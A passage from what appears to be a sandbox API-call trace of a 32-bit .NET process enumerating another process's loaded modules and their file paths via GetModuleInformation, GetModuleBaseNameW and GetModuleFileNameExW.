SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0141.676] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.676] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0141.677] CoTaskMemFree (pv=0x55ab38) [0141.677] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.677] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0141.677] CoTaskMemFree (pv=0x55ab38) [0141.677] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x2333e8c, cb=0xc | out: lpmodinfo=0x2333e8c*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0141.677] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.677] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0141.678] CoTaskMemFree (pv=0x55ab38) [0141.678] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.678] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0141.678] CoTaskMemFree (pv=0x55ab38) [0141.678] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x2335fd4, cb=0xc | out: lpmodinfo=0x2335fd4*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0141.678] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.678] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0141.678] CoTaskMemFree (pv=0x55ab38) [0141.678] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.679] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0141.679] CoTaskMemFree (pv=0x55ab38) [0141.679] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x23380e0, cb=0xc | out: lpmodinfo=0x23380e0*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0141.679] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.679] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0141.679] CoTaskMemFree (pv=0x55ab38) [0141.679] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.679] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0141.680] CoTaskMemFree (pv=0x55ab38) [0141.680] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x233a1f4, cb=0xc | out: lpmodinfo=0x233a1f4*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0141.680] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.680] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0141.680] CoTaskMemFree (pv=0x55ab38) [0141.680] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.680] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0141.681] CoTaskMemFree (pv=0x55ab38) [0141.681] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x233c300, cb=0xc | out: lpmodinfo=0x233c300*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0141.681] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.681] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0141.703] CoTaskMemFree (pv=0x55ab38) [0141.703] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.703] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0141.704] CoTaskMemFree (pv=0x55ab38) [0141.704] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x233e458, cb=0xc | out: lpmodinfo=0x233e458*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0141.704] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.704] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0141.705] CoTaskMemFree (pv=0x55ab38) [0141.705] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.705] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0141.705] CoTaskMemFree (pv=0x55ab38) [0141.705] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x2340564, cb=0xc | out: lpmodinfo=0x2340564*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0141.706] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.706] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0141.706] CoTaskMemFree (pv=0x55ab38) [0141.706] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.706] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0141.706] CoTaskMemFree (pv=0x55ab38) [0141.706] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x2342670, cb=0xc | out: lpmodinfo=0x2342670*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0141.707] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.707] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0141.707] CoTaskMemFree (pv=0x55ab38) [0141.707] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.707] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0141.708] CoTaskMemFree (pv=0x55ab38) [0141.708] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x2344784, cb=0xc | out: lpmodinfo=0x2344784*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0141.708] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.708] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0141.708] CoTaskMemFree (pv=0x55ab38) [0141.708] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.708] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0141.709] CoTaskMemFree (pv=0x55ab38) [0141.709] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x23468b8, cb=0xc | out: lpmodinfo=0x23468b8*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0141.709] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.709] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0141.710] CoTaskMemFree (pv=0x55ab38) [0141.710] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.710] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0141.710] CoTaskMemFree (pv=0x55ab38) [0141.711] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x2348a00, cb=0xc | out: lpmodinfo=0x2348a00*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0141.711] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.711] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0141.712] CoTaskMemFree (pv=0x55ab38) [0141.712] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.712] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0141.712] CoTaskMemFree (pv=0x55ab38) [0141.712] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x234ab0c, cb=0xc | out: lpmodinfo=0x234ab0c*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0141.717] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.718] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0141.718] CoTaskMemFree (pv=0x55ab38) [0141.718] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.718] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0141.719] CoTaskMemFree (pv=0x55ab38) [0141.719] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x234cc18, cb=0xc | out: lpmodinfo=0x234cc18*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0141.719] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.719] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0141.720] CoTaskMemFree (pv=0x55ab38) [0141.720] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.720] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0141.720] CoTaskMemFree (pv=0x55ab38) [0141.720] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x234eda8, cb=0xc | out: lpmodinfo=0x234eda8*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0141.721] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.721] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0141.721] CoTaskMemFree (pv=0x55ab38) [0141.721] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.721] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0141.722] CoTaskMemFree (pv=0x55ab38) [0141.722] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x2350eb4, cb=0xc | out: lpmodinfo=0x2350eb4*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0141.722] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.722] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0141.723] CoTaskMemFree (pv=0x55ab38) [0141.723] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.723] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0141.723] CoTaskMemFree (pv=0x55ab38) [0141.723] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x2352fb8, cb=0xc | out: lpmodinfo=0x2352fb8*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0141.724] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.724] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0141.724] CoTaskMemFree (pv=0x55ab38) [0141.724] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.724] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0141.725] CoTaskMemFree (pv=0x55ab38) [0141.725] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x23550e4, cb=0xc | out: lpmodinfo=0x23550e4*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0141.725] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.725] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0141.726] CoTaskMemFree (pv=0x55ab38) [0141.726] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.726] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0141.727] CoTaskMemFree (pv=0x55ab38) [0141.727] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x23571f0, cb=0xc | out: lpmodinfo=0x23571f0*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0141.727] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.727] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0141.728] CoTaskMemFree (pv=0x55ab38) [0141.728] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.728] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0141.733] CoTaskMemFree (pv=0x55ab38) [0141.733] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x2359320, cb=0xc | out: lpmodinfo=0x2359320*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0141.733] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.733] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0141.734] CoTaskMemFree (pv=0x55ab38) [0141.734] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.734] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0141.734] CoTaskMemFree (pv=0x55ab38) [0141.734] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x235b454, cb=0xc | out: lpmodinfo=0x235b454*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0141.735] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.735] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0141.735] CoTaskMemFree (pv=0x55ab38) [0141.735] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.735] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0141.736] CoTaskMemFree (pv=0x55ab38) [0141.736] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x235d5fc, cb=0xc | out: lpmodinfo=0x235d5fc*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0141.737] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.737] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0141.738] CoTaskMemFree (pv=0x55ab38) [0141.738] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.738] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0141.738] CoTaskMemFree (pv=0x55ab38) [0141.738] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x235f700, cb=0xc | out: lpmodinfo=0x235f700*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0141.739] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.739] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0141.739] CoTaskMemFree (pv=0x55ab38) [0141.739] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.739] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0141.740] CoTaskMemFree (pv=0x55ab38) [0141.740] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x236180c, cb=0xc | out: lpmodinfo=0x236180c*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0141.741] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.741] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0141.741] CoTaskMemFree (pv=0x55ab38) [0141.741] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.741] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0141.742] CoTaskMemFree (pv=0x55ab38) [0141.742] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x236394c, cb=0xc | out: lpmodinfo=0x236394c*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0141.742] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.743] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0141.743] CoTaskMemFree (pv=0x55ab38) [0141.743] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.743] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0141.746] CoTaskMemFree (pv=0x55ab38) [0141.746] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x2365a60, cb=0xc | out: lpmodinfo=0x2365a60*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0141.746] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.747] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0141.747] CoTaskMemFree (pv=0x55ab38) [0141.747] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.747] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0141.748] CoTaskMemFree (pv=0x55ab38) [0141.748] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x2367bfc, cb=0xc | out: lpmodinfo=0x2367bfc*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0141.748] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.749] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0141.749] CoTaskMemFree (pv=0x55ab38) [0141.749] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.749] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0141.750] CoTaskMemFree (pv=0x55ab38) [0141.750] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x2369dc8, cb=0xc | out: lpmodinfo=0x2369dc8*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0141.751] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.751] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0141.751] CoTaskMemFree (pv=0x55ab38) [0141.751] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.751] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0141.752] CoTaskMemFree (pv=0x55ab38) [0141.752] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x236bfb8, cb=0xc | out: lpmodinfo=0x236bfb8*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0141.753] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.753] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0141.754] CoTaskMemFree (pv=0x55ab38) [0141.754] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.754] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0141.755] CoTaskMemFree (pv=0x55ab38) [0141.755] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x236e17c, cb=0xc | out: lpmodinfo=0x236e17c*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0141.756] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.756] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0141.756] CoTaskMemFree (pv=0x55ab38) [0141.756] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.756] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0141.757] CoTaskMemFree (pv=0x55ab38) [0141.757] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x2370448, cb=0xc | out: 